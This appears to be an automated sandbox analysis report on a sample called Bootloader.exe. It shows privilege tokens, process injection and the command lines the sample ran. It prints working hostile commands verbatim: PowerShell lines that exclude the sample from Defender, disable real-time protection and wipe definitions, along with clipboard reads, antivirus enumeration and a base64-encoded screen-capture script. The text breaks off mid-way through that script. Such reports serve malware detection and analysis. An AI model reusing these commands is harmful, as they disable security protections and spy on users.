N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4104 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 4104 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 4020 wrote to memory of 1120 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 4020 wrote to memory of 1120 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 1120 wrote to memory of 1124 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1124 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 3944 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 3944 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1124 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1124 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3944 wrote to memory of 4904 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3944 wrote to memory of 4904 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 1536 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1536 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4120 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4120 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1536 wrote to memory of 4052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1536 wrote to memory of 4052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1120 wrote to memory of 4380 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4380 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4412 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4412 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 4120 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4120 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1120 wrote to memory of 3684 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 3684 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1852 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1852 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4672 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 4672 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 4380 wrote to memory of 3168 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4380 wrote to memory of 3168 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4412 wrote to memory of 4472 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4412 wrote to memory of 4472 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 2688 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 2688 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 3684 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3684 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1852 wrote to memory of 4152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1852 wrote to memory of 4152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4672 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4672 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2688 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2688 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 2812 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 2812 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 2812 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2812 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1120 wrote to memory of 1792 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1792 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1792 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1792 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1120 wrote to memory of 5004 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 5004 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 5004 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 5004 wrote to memory of 3696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 2008 wrote to memory of 936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2008 wrote to memory of 936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1120 wrote to memory of 228 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 228 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 5052 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 5052 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  C:\Windows\system32\cmd.exe
PID 228 wrote to memory of 4000 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 228 wrote to memory of 4000 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Bootloader.exe

"C:\Users\Admin\AppData\Local\Temp\Bootloader.exe"

\??\c:\users\admin\appdata\local\temp\bootloader.exe 

c:\users\admin\appdata\local\temp\bootloader.exe 

\??\c:\users\admin\appdata\local\temp\bootloader.exe 

c:\users\admin\appdata\local\temp\bootloader.exe 

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\bootloader.exe '"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\bootloader.exe '

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8Ab